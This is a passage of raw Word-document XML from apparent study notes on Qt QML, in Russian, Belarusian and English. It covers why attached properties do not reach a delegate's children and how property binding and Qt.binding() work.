        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc483603887"/>
      <w:bookmarkStart w:id="46" w:name="_Toc483605107"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Далучаныя ўласцівасці не работаюць для дэлегатаў</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="003F3E61">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A </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>common error is to assume that attached properties and signal handlers are directly accessible from the children of the object to which these attributes have been attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is not the case. The instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is only attached to specific objects, not to the object and all of its children.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="003F3E61">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For example, below is a modified version of the earlier example involving attached properties. This time, the delegate is an</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the colored</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a child of that item:</w:t>
      </w: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import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QtQuick</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2.0</w:t>
      </w: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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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240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height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320</w:t>
      </w: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model</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w:t>
      </w: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delegate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Item</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width</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100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height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30</w:t>
      </w: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Rectangle</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width</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100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height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30</w:t>
      </w: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color</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ListView</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isCurrentItem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"red"</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"yellow"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// WRONG! This won't work.</w:t>
      </w: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rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="003F3E61">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="003F3E61">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A25E2" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="003F208F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc382058565"/>
      <w:bookmarkStart w:id="48" w:name="_Toc483000528"/>
      <w:bookmarkStart w:id="49" w:name="_Toc483003569"/>
      <w:bookmarkStart w:id="50" w:name="_Toc483603888"/>
      <w:bookmarkStart w:id="51" w:name="_Toc483605108"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>СВЯЗЫВАНИЕ СВОЙСТВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-propertybinding.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BD07B4" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того чтобы использовать </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> полностью и его </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">встроенную поддержку для применения динамических изменений поведения </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объе</w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>кт</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, большинство </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ов будет использовать </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>связывание свойств</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это центральная особенность </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которая позволяет </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ам автоматически обновлять свои свойства в ответ на изменения атрибутов других </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ов или на появление некоторых внешних событий.</w:t>
      </w:r>
      <w:r w:rsidR="00E41312" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда свойству </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а присваивается значение, ему может быть присвоено или </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>статическое значение</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или оно может быть связано </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java script</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> выражением</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В первом случае, свойство не изменится, пока ему не будет присвоено новое значение. В последнем случае </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">связывание свойства создаётся и значение свойства автоматически обновляется при помощи </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> движка всякий раз, когда значение оцениваемого выражения изменяется.</w:t>
      </w:r>
      <w:r w:rsidR="00E41312" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Будьте внимательны</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, так как </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>если в будущем свойству присвоится статическое значение, то это удалит связывание.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если вы желаете </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>одно связывание заменить другим связыванием</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, то используйте функцию </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.binding()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>которая</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>обеспечивает</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>желаемый</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>результат</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00957A2A">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For </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
